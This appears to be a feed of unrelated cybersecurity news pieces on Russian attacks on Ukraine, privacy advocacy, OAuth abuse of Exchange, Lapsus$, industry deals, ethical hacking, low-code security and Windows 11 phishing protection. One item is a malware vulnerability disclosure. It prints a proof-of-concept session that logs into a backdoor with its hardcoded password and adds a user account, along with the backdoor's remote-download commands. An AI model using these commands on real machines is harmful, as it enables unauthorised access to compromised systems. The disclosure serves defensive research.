The Ukrainian government on Monday warned of "massive cyberattacks" by Russia targeting critical infrastructure facilities located in the country and that of its allies.
The attacks are said to be targeting the energy sector, the Main Directorate of Intelligence of the Ministry of Defense of Ukraine (GUR) said.
"By the cyberattacks, the enemy will try to increase the effect of missile strikes on

The Ukrainian government on Monday warned of "massive cyberattacks" by Russia targeting critical infrastructure facilities located in the country and that of its allies.

The attacks are said to be targeting the energy sector, the Main Directorate of Intelligence of the Ministry of Defense of Ukraine (GUR) said.

"By the cyberattacks, the enemy will try to increase the effect of missile strikes on electricity supply facilities, primarily in the eastern and southern regions of Ukraine," the agency said in a brief advisory.

GUR also cautioned of intensified distributed denial-of-service (DDoS) attacks aimed at the critical infrastructure of Ukraine's closest allies, chiefly Poland and the Baltic states of Estonia, Latvia, and Lithuania.

It's not immediately clear what prompted the intelligence agency to issue the notice, but Ukraine has been at the receiving end of disruptive and destructive cyberattacks since the onset of the Russo-Ukrainian war earlier this February.

Even prior to that, a Russian state-sponsored group tracked as Sandworm (aka Voodoo Bear) orchestrated the 2015 and 2016 targeting of the Ukrainian power grids, causing over 225,000 Ukrainians to lose electricity during the month of December.

While the first attack involved the use of a revamped variant of a malware called BlackEnergy, the December 2016 intrusions notably made use of a custom malware known as Industroyer (aka CrashOverRide) that's specifically designed to sabotage critical infra systems.

In the aftermath of the Russian military invasion of Ukraine, the Computer Emergency Response Team (CERT-UA) disclosed in April that it had fielded an attack targeting an unnamed energy provider that utilized an updated version of the Industroyer malware.

Sandworm, for its part, has been most recently observed masquerading as Ukrainian telecom operators such as Datagroup and EuroTransTelecom to deliver payloads like Colibri loader and Warzone RAT.

Microsoft, in June, also notified of rising Russian cyberattacks, stating that threat actors were not only going after government systems, but also prioritizing other sectors as part of its espionage efforts, including think tanks, IT firms, and energy companies.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Ukraine Says Russia Planning Massive Cyberattacks on its Critical Infrastructures

Want to speak up against Big Tech, unjust data collection, and surveillance? Here's how to be an activist in your community and beyond.

Your Facebook is no longer a naked-to-the-public firehose of information about your family and social life. Your mobile phone is as do-not-track as you’re able to function under. You cover your webcam lens when it’s not in use.

In short, you’ve done what you can to mitigate the way the current world seeks to share and expose your personal information. It takes energy and knowledge to break away from the default settings of digital devices, social networks, and retailers seeking more, more, more information. But you’ve done it, at least what you can. You feel pretty good about safeguarding some (but not all) of your private data and being proactive about it.

So what’s this nagging feeling in the back of your skull? Do you sometimes feel like you could be doing even more in the battle to protect citizens from the overreach of data scrapers and tech moguls who value monetization over individual rights?

It takes a lot of committed people to fight these battles in courtrooms, in the digital marketplace, and on the platforms themselves (Facebook, Twitter, and LinkedIn, among others) that have become battlegrounds for our data. You could be one of these people: an advocate for data privacy who is actively involved in helping protect us all.

Advocacy Near Home

Getting your own house in order in regards to privacy could mean literally getting your house in order. Setting up a VPN (virtual private network) service for your entire household, for instance, can offer your entire family a shield to prying eyes online, including threats from hackers, although finding a reputable one with strong data privacy policies that also won’t scoop up your data can itself be a challenge.

If you have kids old enough to join social networks (the legal age is 13 in the US), take the time to help them set up and understand their privacy settings, especially on social networks that have a poor track record on that front (such as Facebook and TikTok). The same goes for online game networks they might play on such as Nintendo Online or the PlayStation Network, not to mention popular games like _Roblox_ and _Minecraft_ (which is owned by Microsoft, who also operates Xbox Live, which also has social features).

Similarly, stay in the loop on new policies and legal changes that could affect the way companies handle your kids’ data. You should also learn how your kids’ school and school district handle issues such as data on school devices, software in schools, and surveillance cameras on campus.

You don’t want to be the person who posts hoaxes about how Facebook is going to use your photos and information, but spreading the word from legit sources to extended family and friends about good privacy hygiene is one way to raise awareness of the problems that exist. The United States Privacy Digest from the International Association of Privacy Professionals, The Hacker News, Privacy International, and—not to toot our own horn—WIRED’s own coverage of privacy issues are good places to get informed or search for specific stories around these topics.

Take Your Advocacy Public

The Electronic Frontier Foundation (or EFF) is a civil liberties nonprofit founded in the San Francisco Bay Area in 1990. It’s been carrying the torch for fighting threats to free speech and privacy ever since. The EFF says it has seen a recent “big uptick” in interest from people wanting to protect privacy on their phone; for instance, there are 100,000 views on a post about disabling Ad ID on iOS and Android devices. “We are clearly seeing that people are increasingly concerned about digital rights,” says Karen Gullo, analyst and senior media relations specialist at EFF. 

The organization offered WIRED a list of things you can do if you’d like to get more involved in advocating for data privacy.

To start with, find out where your local and state lawmakers stand on privacy and make your own voice heard. Call or email them, or speak up at town halls and other meetings. “Check with your local city council to see if they have a committee that is looking into data-privacy issues, or suggest that they form one,” says Karen Gullo, analyst and senior media relations specialist at EFF. “Ask for a citizen advocate to be part of that committee.”

You could also form your own committee, briefing those local officials on data policies and threats, and informing the public with talks at local libraries and other public locations. The EFF pointed to Oakland Privacy, a citizen’s coalition that succeeded in this kind of effort; the group helped get an ordinance passed requiring towns in its area to be transparent about surveillance technology.

The EFF is currently pushing the My Body, My Data Act, which would protect personal health care data related to reproductive rights. You can learn how to take action to support this act on the EFF’s website.

Similarly, the Electronic Frontier Association itself is comprised of grassroots digital-rights advocacy groups in cities and campuses across the country, and they may be looking for volunteers in your area. You can get involved with security training projects and educational events through an existing chapter, or by starting your own coalition.

How to Advocate for Data Privacy and Users' Rights

Categories: News
Tags: Exchange

Tags:  OAuth

Tags:  spam

Tags:  MFA

Tags:  Transport rules

Tags:  connector

Threat actors have been using malicious OAuth applications to abuse Microsoft Exchange servers for their spam campaign.



(Read more...)




The post Exchange servers abused for spam through malicious OAuth applications appeared first on Malwarebytes Labs.

Posted: September 27, 2022 by

Microsoft has published a security blog about an investigation into an attack in which threat actors used malicious OAuth applications to abuse Exchange servers for their spam campaign.

The threat actor behind this attack has been active for many years, and has been running spam campaigns using various methods that provided them with high volume spamming opportunities.

**Credential stuffing**

As Microsoft notes, in the initial stage of the attack the threat actor launched credential stuffing attacks against high-risk accounts that were not protected by multi-factor authentication (MFA). Once in, the threat actor was able to gain access to administrator accounts. The authentication attempts were launched against the Azure Active Directory PowerShell application which was later used to deploy the rest of the attack.

**OAuth application**

The threat actor then proceeded to set up the malicious OAuth application. OAuth enables apps to obtain limited access to a user’s data without giving away a user’s password. The threat actor registered a new OAuth application and granted it global admin and Exchange admin roles.

The threat actor added their own credentials to the OAuth application, enabling them to access the application even if the owner of the compromised account changed their password.

**Changing Exchange settings**

The threat actor then used the privileged application to authenticate the Exchange Online PowerShell module and modify the Exchange settings of the compromised server.

One modification was to create a new inbound connector. Connectors are a collection of instructions that customize the way email flows to and from organizations using Microsoft 365 or Office 365. The threat actor set up a new connector that allowed mails from certain IPs related to the attacker’s infrastructure to flow through the victim’s Exchange server. This enabled them to send emails that looked like they came from the compromised Exchange domain.

**Transport rules**

Transport rules, aka mail flow rules, are sets of actions that can be performed on any mail that flows in the organization. The threat actor used this feature to delete specific headers from every mail that flowed in the organization. By deleting these headers, the attacker tried to prevent security products or email providers from detecting or blocking their emails.

**Usage**

This flow of preparations gave the threat actor all they needed to send out a spam campaign. Microsoft observed that the threat actor did not always use the application right after it was deployed. In some cases, it took weeks or months before the application was utilized.

After each spam campaign, the actor deleted the malicious inbound connector and transport rules to prevent detection, but they kept the application which could be used to prepare the next part of the attack. In some cases, the app remained dormant for months before it was reused by the threat actor.

**Motive**

The threat actor has been active in high volume spam campaigns for years. In this case, the objective was to send out sweepstakes spam emails designed to trick recipients into providing credit card details and signing up for recurring subscriptions under the guise of winning a valuable prize.

_Image courtesy of Microsoft_

As an extra precaution, the threat actor used cloud-based outbound email infrastructure like Amazon SES and Mail Chimp, both of which are routinely used for marketing and other legitimate purposes.

**Mitigation**

*   As always, use MFA protection for all accounts, especially important administrator ones.
*   Limit the amount of login trials, for example by implementing a timeout after a few failed login attempts.
*   Implement conditional access policies that check the login attempt against other conditions like the originating IP address or device, which can flag unusual tries.

**RELATED ARTICLES**

Exchange servers abused for spam through malicious OAuth applications

The fun-loving cybercriminals blamed for breaches of Uber and Rockstar are exposing weaknesses in ways others aren't.

After suffering a breach earlier this month, the ride-share platform Uber said last week that it believes the infamous hacking group Lapsus$ was behind the attack. The incident was in line with the group's track record of using phishing to gain access to corporate accounts that can then be parlayed into broader access. Then on September 23, police in the United Kingdom said they had arrested an unnamed 17-year-old in Oxfordshire who seems to be one of the individuals previously arrested in connection to Lapsus$ in March.

Lapsus$, which may also have breached the _Grand Theft Auto_ developer Rockstar in this latest hacking spree, has established itself in the pantheon of memorable hacking groups for breaching a slew of massive tech companies, including Microsoft, Nvidia, Okta, Samsung, and Ubisoft. They did so to make money, sure, but they also apparently wanted to take the digital-teen joyride of a lifetime. Researchers say that this wild and unpredictable streak is an important key to the group's success that should not be overlooked.

“Lapsus$ probably aren’t causing as much destruction as other actors with different motivations could, and I think that's the answer—they aren’t entirely motivated by money,” says Brett Callow, a threat analyst at the antivirus company Emsisoft. “They, therefore, attempt things that purely financially motivated cybercriminals wouldn’t. They are more likely to be adventurous and to try things—that may not have a payoff—just for the fun of it.”

This creative enthusiasm and flair for the dramatic is an important case study. While Lapsus$ seems to perpetrate crimes of opportunity rather than working under a mandate to target certain entities or achieve specific results, the way nation-state actors often do, their seemingly boundless success reveals just how many weaknesses are lurking in organizations around the world that have gone unexposed only because they weren't immediately useful to state-backed actors or cybercriminals. 

“I find the Lapsus$ group significant, because they have highlighted systemic problems in real-world implementations of single sign-on and multifactor authentication,” says independent security researcher Bill Demirkapi. “The techniques that they've used in their attacks are nothing new, but what we're seeing is the widespread abuse of these weaknesses and a wakeup call to organizations.”

Lapsus$ breached Uber by targeting an individual contractor whose username and password had been compromised by another entity through a malware infection and was sold on the dark web, the company said. Lapsus$ repeatedly sent the victim multifactor authentication login notifications until they mistakenly approved access. In a previous, unrelated attack, Lapsus$ breached a contractor working with the authentication company Okta in an attempt to compromise organizations through the identity management provider. The tactics in both instances show that there are weaknesses in some multifactor authentication strategies and they highlight a downside to “single sign-on” schemes in which one carefully protected authentication process grants access to a slew of services. The benefit to organizations is that there's only one account to protect and manage instead of many, and this cuts down on weaknesses like password reuse. The drawback, though, is that if an attacker compromises a single-sign-on account, they gain access to multiple internal services within an organization at once.

“At the end of the day, the flexibility of how you can abuse corporate accounts to move laterally and pivot over to other applications in the cloud—there are just so many different ways that attackers can use enterprise credentials,” says Crane Hassold, director of threat intelligence at Abnormal Security and a former digital behavior analyst for the FBI. “That's why phishing is so extremely popular with cybercriminals, because of that return on investment.”

There are stronger ways to implement two-factor authentication, and the new generation of “password-less” login schemes or “Passkeys” from the industry FIDO2 standard promise a much less phishable future. But organizations need to actually start implementing these more robust protections so they're in place when a ransomware actor (or restless teen) starts poking around.

“Phishing is obviously a huge problem, and most of the things that we normally think of as multifactor authentication, like using a code generator app, are at least somewhat phishable, because you can trick someone into revealing the code,” says Jim Fenton, an independent identity privacy and security consultant. “But with push notifications, it’s just too easy to get people to click ‘accept.’ If you have to plug something directly into your computer to authenticate or use something integrated with your endpoint, like a biometric sensor, those are phishing-resistant technologies."

Keeping attackers from clawing their way into an organization through phishing isn't the only problem, though. As the Uber incident showed, once Lapsus$ had compromised one account to gain access, they were able to burrow deeper into Uber's systems, because they found credentials for internal tools lying around unprotected. Security is all about raising the barrier to entry, not eliminating all threats, so strong authentication on external-facing accounts would certainly have gone a long way toward stopping a group like Lapsus$. But organizations must still implement multiple lines of defense so there's a fallback in case one is breached. 

In recent weeks, former Twitter security chief Peiter “Mudge” Zatko has publicly come out as a whistleblower against Twitter, testifying before a US Senate committee that the social media giant is woefully insecure. Zatko's claims—which Twitter denies—illuminate how high the cost could be when a company's internal defenses are lacking.

For its part, Lapsus$ may have a reputation as an outlandish and oddball actor, but researchers say that the extent of its success in compromising massive companies is not just remarkable but also disturbing.

“Lapsus$ has highlighted that the industry must take action against these weaknesses in common authentication implementations,” Demirkapi says. “In the short term we need to start by securing what we currently have, while in the longer term we must move toward forms of authentication that are secure by design.”

No wakeup call ever seems sufficiently dire to produce massive investment and quick, ubiquitous implementation of cybersecurity defenses, but with Lapsus$ organizations may have an additional motivation now that the group has shown the world just how much is possible if you're talented and have some time on your hands. 

“Cybercriminal enterprises are exactly the same as legitimate businesses in the sense that they look at what other people are doing and emulate the strategies that prove successful,” Emsisoft's Callow says. “So the ransomware gangs and other operations will absolutely be looking at what Lapsus$ has done to see what they can learn.”

The Dire Warnings in the Lapsus$ Hacker Joyride

Funding has been somewhat lower than last year, but investment remains healthy, analysts say, amid thirst for cloud security in particular.

The cybersecurity industry continues to remain largely unaffected by the uncertainty surrounding the rest of the economy.

Though funding activity this year is somewhat slower than in 2021 and market valuations of cybersecurity firms have taken a hit, mergers and acquisitions activity has remained strong through the year, as has investor interest in the sector.

So far in the third quarter, there have been multiple major transactions that, according to analysts, highlight the overall robustness of the sector amid broadening concerns of a recession.

**Robust M&A Activity**

Two of the biggest involved previously announced deals: In September, Google completed its planned acquisition of incident response firm Mandiant for $5.4 billion, and in August, private equity firm Thoma Bravo closed it $6.9 billion purchase of identity management vendor SailPoint.

That same month, Thoma Bravo announced plans to acquire Ping Identity for $2.8 billion in cash. The $28.50 per share that the private equity firm offered for Ping represented a 63% premium over the identity management vendor's closing share price on Aug. 2. Thoma Bravo will take Ping private once the deal is completed in the fourth quarter. 

Other examples of M&A activity in the third quarter include Devo's purchase of SOAR vendor LogicHub for an undisclosed amount, Volaris Group's acquisition of Hitachi ID Systems in September, Cerberus Sentinel's purchase of application security vendor CyberViking, and CrowdStrike's acquisition of Reposify last week.

M&A activity in the third quarter is consistent with activity in the previous two quarters. Data from Momentum Cyber shows there were a total of 148 cybersecurity M&A deals during the first half of 2022. Total M&A volume over the period was nearly $103 billion. Momentum Cyber identified eight M&A transactions during the first half of 2022 that topped $1 billion, including the SailPoint and Mandiant deals, and private equity firm KKR's $4 billion acquisition of Barracuda.

The most obvious trend of late has been the move by larger vendors to buy into the attack surface management (ASM) space, and more specifically external attack surface management (EASM), says Rik Turner, an analyst with Omdia.

"This has, of course, been underway for a while," he says, pointing to Palo Alto's purchase of Expanse in November 2020 and Microsoft picking up RiskIQ in July 2021. "But there has been something of an intensification of this tendency of late, with Tenable acquiring Bit Discovery in April, IBM buying Randori in June, and CrowdStrike picking up Reposify last week," Turner says.

There are numerous other EASM vendors, so there will be no shortage of acquisition targets for any other big players that want to get into this market, he says.

**Multiple Market Drivers**

Turner says one of the other trends driving the M&A activity is growing interest in proactive security technologies, as opposed to the focus on reactive detection and response of the past few years.

"The proactive wave posits not a replacement technology for the reactive ones, but rather complementary ones that seek to reduce a customer's overall attack surface before threat actors have even launched an attack," Turner says. "Unlike the extended detection and response (XDR) spectrum, proactive security doesn't have a single acronym or initialism yet that can capture the imagination of the market, though Omdia is tentatively proposing security posture management, or SPM." 

Examples of products that fall into this category include cloud-specific proactive technologies such as cloud security posture management (CSPM), SaaS security posture management (SSPM), and cloud permissions management (CPM). Breach and attack simulation technologies are other examples as are vulnerability management and patch management, Turner says.

Chris Stafford, a senior manager in West Monroe's M&A practice, sees another set of factors driving the financial activity in the cybersecurity space. According to Stafford, the big ones are accelerated cloud adoption, the shift to remote work, and the continuing talent shortage. 

 "Fundamentally, cybersecurity is a really durable sector from a growth and revenue perspective," Stafford says. "All companies across all sectors require cybersecurity tools and services. That is what is fundamentally driving growth in the industry."

**Funding & VC Interest Slow but Remain Healthy**

While M&A activity has maintained a robust pace through the year, funding activity has been somewhat lower than last year, as noted earlier. Data from analyst firm IT-Harvest shows that through Sept. 1, some 220 vendors received a total of $12.3 billion in direct funding from investors. 

"That is half of 2021's record $24 billion, but more than the previous year's $10 billion," says Richard Stiennon, chief research scientist at IT-Harvest, adding that just 33 companies received more than $100 million so far this year, compared with 69 in 2021. "I expect to see the industry finish the year at $15 billion total invested," Stiennon says.

Omdia's Turner says while venture capital funding overall appears to have dipped somewhat, there is still plenty of money available for projects that VC's find especially interesting. "I think they have gotten somewhat choosier than they were in 2021," Turner says.

IT-Harvest's analysis of funding activity so far this year showed that investors are pouring more money into the security analytics space — $2.6 billion — than any other segment. Stiennon points to the more than $500 million in total that Devo has raised so far and the massive $1-plus billion funding round that Securonix received in February as examples of investor interest in this segment.

Identity and network security were the next two most active categories, with $1.4 billion in funding in each. There is also a trend of investing in cloud analytics and general security operations center tools like XDR, and a resurgence in vulnerability management startups that are getting funding, Stiennon notes.

"In short, funding is extremely healthy. No surprise to me because venture funding is not like the stock market, where you invest on expectations of next quarter's results," he says. "Most VCs have a five-year horizon, and they can count on cybersecurity to still be a growing sector through an economic downturn."

Despite Recession Jitters, M&A Dominates a Robust Cybersecurity Market

Backdoor.Win32.Bingle.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/eacaa12336f50f1c395663fba92a4d32.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Bingle.bVulnerability: Weak Hardcoded CredentialsDescription: The malware is packed using ASPack 2.11, listens on TCP port 22 and requires authentication. However, the password "let me in" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.Family: BingleType: PE32MD5: eacaa12336f50f1c395663fba92a4d32Vuln ID: MVID-2022-0643 Disclosure: 09/24/2022004029A0                 call    sub_4010E0004029A5                 add     esp, 0Ch004029A8                 cmp     eax, ebp004029AA                 jge     short loc_4029CC004029AC                 mov     edi, [esp+eax*4+230h+var_21C]004029B0                 mov     ecx, ebx004029B2                 xor     eax, eax004029B4                 repne scasb004029B6                 not     ecx004029B8                 sub     edi, ecx004029BA                 mov     edx, ecx004029BC                 mov     esi, edi004029BE                 mov     edi, offset aLetMeIn ; "let me in"Exploit/PoC:C:\>nc64.exe x.x.x.x 22let me in Nt Shell 1.0 beta by bingle@email.com.cn        Indicator '#' is NTShell Server output.        Type ?help for support commands beyond cmd;        ?use at command line for support parameters.        Use 'net helpmsg xxx' to see detail message of Error Code.Microsoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\Victim\Desktop>whoamiwhoamidesktop-2c3iqho\victimC:\Users\Victim\Desktop>net user hyp3rlinx 1313 /addnet user hyp3rlinx 1313 /addThe command completed successfully.C:\Users\Victim\Desktop>?help#?autorun [name file "args"] --- add the [file] to autorun when reboot,                 [file] default is ntshell.exe#?canceldata            --- abort the previous file transfer command#?chdir <dir>           --- change the server current dir to <dir>,                 can be UNC(share) name#?get <file> [port]     --- GET <file> from server, server use [port] to tranfer#?help                  --- show this HELP#?httpget <url> <file>  --- get the 'file' from 'url',                eg:httpget http://192.168.0.1 /hackdir/hackprog.exe#?pskill PID            --- Kill the Process with PID#?pslist                --- List the all process in system#?put <file> [port]     --- PUT <file> to server, server use [port] to tranfer#?quit                  --- QUIT the telnetd program#?restart [<user> [pass]]       --- restart the shell as [user] in stead of                IUSR_computer if [user] specified, no need to reconnect#?sysinfor              --- Get the System os informationDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Bingle.b MVID-2022-0643 Hardcoded Credential

For white hats who play by the rules, here are several ethical tenets to consider.

Earlier this year when international cyber-gang Lapsus$ attacked major tech brands including Samsung, Microsoft, Nvidia and password manager Okta, an ethical line seemed to have been crossed for many cybercriminals.

Even by their murky standards, the extent of the breach, the disruption caused, and the profile of the businesses involved was just too much. So, the cybercrime community came together to punish Lapsus$ by leaking information on the group, a move that ultimately led to their arrest and breakup.

So maybe there's honor amongst thieves after all? Now, don't get me wrong; this isn't a pat on the back for cybercriminals, but it does indicate that at least some professional code is being followed.

Which raises a question for the wider law-abiding hacking community: Should we have our own ethical code of conduct? And if so, what might that look like?

**What Is Ethical Hacking?**

 First let's define ethical hacking. It is the process of assessing a computer system, network, infrastructure, or application with good intentions, to find vulnerabilities and security flaws that developers might have overlooked. Essentially, it's finding the weak spots before the bad guys do and alerting the organization, so it can avoid any big reputational or financial loss.

Ethical hacking requires, at a bare minimum, the knowledge and permission of the business or organization which is the subject of your attempted infiltration.

Here are five other guiding principles for activity to be considered ethical hacking.

**Hack To Secure**

An ethical and white-hat hacker coming to assess the security of any company will look for vulnerabilities, not only in the system but also in the reporting and information handling processes. The goal these hackers is to discover vulnerabilities, provide detailed insights, and make recommendations for building a secure environment. Ultimately, they're looking to make the organization more secure.

**Hack Responsibly**

Hackers must ensure they have permission, outlining clearly the extent of access the company is giving, as well as the scope of the work they are doing. This is very important. Target knowledge, and a clear scope, help prevent any accidental compromises and establish solid lines of communication if the hacker uncovers anything alarming. Responsibility, timely communication, and openness are vital ethical principles to abide by, and clearly distinguish a hacker from a cybercriminal and from the rest of the security team.

**Document Everything**

All good hackers keep detailed notes of everything they do during an assessment and log all command and tool output. First and foremost, this is to protect themselves. For example, if an issue occurs during a penetration test, the employer will look to the hacker first. Having a timestamped log of the activities performed, be it exploiting a system or scanning for malware, gives piece of mind to organizations by reminding them that hackers work with them, not against them.

Good notes uphold the ethical and legal side of things; they are also the basis of the report hackers will produce, even when there are no major findings. The notes will allow them to highlight the issues they have identified, the steps needed to reproduce the issues, and detailed suggestions on how to fix them.

**Keep Communications Active**

Open and timely communications should be clearly defined in the contract. Staying in communication throughout an assessment is key. Good practice is to always notify when assessments are running; a daily email with the assessment run times is vital.

While the hacker might not need to report all the vulnerabilities they find immediately to their client contact, they still should flag any critical, show-stopping flaw during an external penetration test. This could be an exploitable unauthenticated RCE or SQLi, a malicious code execution, or sensitive data disclosure vulnerability. When encountering these, hackers stop testing, issue a written vulnerability notification via email, and follow up with a phone call. This gives teams on the business side the chance to pause and fix the issue immediately if they choose. It's irresponsible to let a flaw of this magnitude go unflagged until the report is issued weeks later.

Hackers should keep their main points of contact aware of their progress and any major issues they discover as they proceed. This ensures everyone is aware of any issues ahead of the final report.

**Have a Hacker Mindset**

The term hacking was used even before information security grew in importance. It just means to use things in unintended ways. For this, hackers first seek to understand all the intended use cases of a system and take into consideration all its components.

Hackers must keep developing this mindset and never stop learning. This allows them to think both from a defensive and an offensive perspective and is useful when looking at something you have never experienced before. By creating best practices, understanding the target, and creating attack paths, a hacker can deliver amazing results.

Should Hacking Have a Code of Conduct?

Many enterprise applications are built outside of IT, but we still treat the platforms they're built with as point solutions.

We're used to thinking about securing software-as-a-service (SaaS) platforms and the cloud as two separate beasts. This separation stems from the way SaaS and the public cloud first emerged as small point solutions and an extension of the traditional data center, respectively. Today, due to the advent of low code, this separation is wrong, and it's holding us back from seeing what's right in front of our eyes. Low code makes SaaS platforms a part of the public cloud, a place where developers build multiple applications rather than consuming a single one: a cloud platform.

Failing to shift our mindset leads to where we are today, with those applications being left up for grabs with no security visibility. And to make matters worse, low-code applications are embedded right into platforms like Salesforce and Microsoft Dynamics, which we all use and that hold our most sensitive business data.

**How Did We Get Here?**

Origin stories are always interesting because they explain something fundamental about the way we perceive the hero of the story. While SaaS started as an extension of the corporate network, the public cloud started as an extension of the data center. Those very different starting points explain why securing SaaS started with shadow IT (protecting the perimeter) and securing the public cloud started with workload protection (lift-and-shift servers and their network/host agents). This also meant that different security teams were tasked with securing SaaS and the cloud, which of course led to a separation of tools, different threat modeling, and, most importantly, the formation of different security mindsets.

Both SaaS and the public cloud have drastically evolved from those early days. Public cloud vendors introduced ever more granular compute paradigms, gradually introducing infrastructure as a service (IaaS), platform as a service (PaaS), and serverless to help developers focus on the business problem at hand. They also built an entire ecosystem of ready-made solutions for complex yet common problems — identity, permissions, logging, configuration, and deployment, to name a few.

SaaS used to mean a point solution for a specific problem. Salesforce started as a CRM, ServiceNow as a ticketing system, and Office365 as email, spreadsheets, docs, and slides. (While this is more than one solution, these are very specific ones.) Contrast that with today: Salesforce Developers are building apps for just about any business need on top of the Salesforce Platform, ServiceNow low-code apps are handling just about anything from HR to health and finance processes, and Power Platform, Microsoft's low-code platform embedded into Office365, is being used by more than 20 million users across the industry to solve every business need, from productivity through procurement and COVID-related processes.

Clearly, these have become enterprise-grade application development platforms, not point solutions to specific business problems. Many developers today choose to build their applications on platform-provided abstractions, whether those are serverless functions on the public cloud or extendable building blocks on SaaS low-code platforms.

**The Introduction of Business Developers**

Comparing how SaaS platforms started and where they are now clearly shows how far these have come from their earlier versions. But there's still a major shift we haven't mentioned yet: the introduction of business developers.

SaaS low-code platforms draw their power from the data they maintain and their existing users. Those are both not limited to IT but rather skew heavily toward the business. Having access to both business data and business users means that SaaS is in the perfect position to tackle the most pressing issue many enterprises face today — digital transformation.

With a global shortage of developers and the difficulty of streamlining a business process with so many stakeholders, low-code platforms introduce a shortcut, letting the business users streamline their processes themselves without waiting for IT.

Low code is taking off with business users, so much so that in his 2019 Inspire keynote, Microsoft CEO Satya Nadella discussed the opportunity of low code to empower people and to create new white-collar jobs just like Excel did.

Just like the public cloud is an application development platform enabling developers to focus on their business logic, SaaS platforms have become application development platforms using low code to empower business users to become developers and address any business need.

SaaS is now focused on new types of developers addressing a whole range of unmet business needs with dedicated applications, creating a new type of cloud: the business cloud.

**Securing Low Code as an Extension of Cloud**

With the realization that some SaaS platforms are now application development platforms and an extension of the cloud, we should re-examine the responsibilities for securing those applications and bringing them under the security team's umbrella.

We should treat platforms like Salesforce, ServiceNow, and Office365 the same way we treat AWS, Azure, and GCP, where we focus on the applications that were built and are hosted in these application development platforms rather than treating the whole platform as a single application.

Shadow IT, for example, remains an issue with smaller and an ever-growing number of point-solution SaaS. But it doesn't make sense to treat any single platform mentioned above as a single app to discover and catalog. Instead, we should discover and catalog the applications built with those platforms — and there are tens of thousands of those. In most organizations, this enormous complexity is hidden behind a single line in an application inventory.

Applications built with SaaS low-code platforms should be examined with the same security rigor we use for those built on the cloud because, at the end of the day, an application is an application, no matter where it was built and hosted.

What does matter for the security of our business applications is the people, process, and tools that are involved in making, maintaining, and protecting those applications. For applications built in the cloud, we have professional developers, automated CI/CD processes, and various security tools from code scanning and dynamic analysis through runtime monitoring and prevention. For applications built on SaaS low-code platforms, we have some professional developers but also business users who are not security-savvy, with few to no deployment processes and no security controls or guarantees.

Thinking about low-code platforms as part of SaaS makes it difficult for us to see that a huge portion of our business applications are now being built by the business, outside of IT and outside of security control. To begin seeing the problem and figuring out our approach to it, we must shift our mindset to acknowledge low-code platforms as a part of the cloud and treat the applications on those platforms like we do any other application.

We're Thinking About SaaS the Wrong Way

Categories: News
Tags: Windows 11

Tags:  Windows 10

Tags:  phishing

Tags:  protection

Tags:  warning

Tags:  message

Tags:  Defender Smartscreen

We take a look at a new set of security features for Windows 11, and see what Windows 10 can expect to miss out on.



(Read more...)




The post Windows 11 pulls ahead of Windows 10 in anti-phishing stakes appeared first on Malwarebytes Labs.

Some new security additions and changes have been announced for users of Windows, but you’ll have to be using Windows 11 to get the most out of them. Windows 10 users may find that this is going to be a case of falling behind the herd ever so slightly.

**Anti-phishing tools**

Enhanced phishing protection, by way of Smartscreen, is the name of the game, and Microsoft is all too happy to explain the changes. Smartscreen is a Windows feature which helps ward off bogus sites phishing for personal data and payment information. People running IE8 and later will also find it attempts to protect against infectious files. It offers slightly different features depending on which flavour of Microsoft browser you’re using, but the overall end result is largely the same: A variety of protections against phishing portals.

In terms of features for Windows 11, enhanced phishing protection “automatically detects when users type their password into any app or site”. Windows knows “in real time” whether websites and apps have secure connections to trusted websites, notifying users of potential danger up ahead and also spreading word to other users when a phishing attack is blocked.

There is also mention of Windows analysing when and where password entry occurs, notifying users of potentially unsafe usage. This sounds a lot like how many password managers operate, popping a notification when (for example) password reuse is detected. One key difference here is that using passwords in an unsafe way is “reported to IT” for incident tracking purposes.

**Friendly popups**

There are some interesting additions to the user experience. Typing a password into a phishing site in a Chromium browser, or an application connecting to a phishing portal, presents the user with a popup which says:

> _This app made an unsafe connection that was reported to Microsoft for stealing passwords. Your organisation recommends changing your work or school password to keep your account safe._

Clicking the **change password** button takes users to sign-in options where they can alter the password as needed. Microsoft says that without this feature, credentials may be handed over to the fake site. On the other hand, popups that lead people from dangerous sites to password amendment options may encourage malicious imitations that trick unwary users. However, two sets of popups might increase the chances of something untoward being noticed, but the history of UX is littered with intolerant users blazing through that sort of thing.

Elsewhere, Windows will notify users who are typing passwords into notepad files and other programs that this is bad practice. As per the relevant popup:

> _It’s unsafe to store your password in this app. Your organisation considers it unsafe to store your password in this app and recommends removing your password from this file._

We’re not here today to discuss the merits and drawbacks of off-the-beaten-track password systems. However, it’s worth noting that this detection of typed passwords is raising some eyebrows:

> The advice is good but it should come from a human, not the OS. How long has Windows been reading what I paste into Notepad? #privacy #security https://t.co/7iZNWDpzG7
> 
> — m (@tinymwriter) September 23, 2022

**Windows 11, but not 10**

Finally, we come to the part where our two operating system paths diverge.

Custom-made phishing alerts are available to Windows 11 users, but not to users of Windows 10. Organisations can configure Enhanced Phishing Protection to warn uses about password reuse, unsafe apps, and malicious activity, and can and switch the feature's audit mode on and off, which determines whether sends telemetry about unsafe password events.

It’s to be expected that Windows 11 will eventually pull away from 10 in the security frontrunner stakes. Although adoption was low at the tail end of 2021, numbers will slowly ramp up over time as the Windows 10 end-of-life approaches, and organisations catch up with the stringent hardware requirements.

Only a few months back, we saw Microsoft tackling RDP intrusion with rate limiting for login attempts. We also now have upgrades to kernel protection, more support for hybrid work operations, and new default limits for SMB server authentication. It’s inevitable that we’ll continue to see this happening, and so the gulf will widen between the OS siblings.

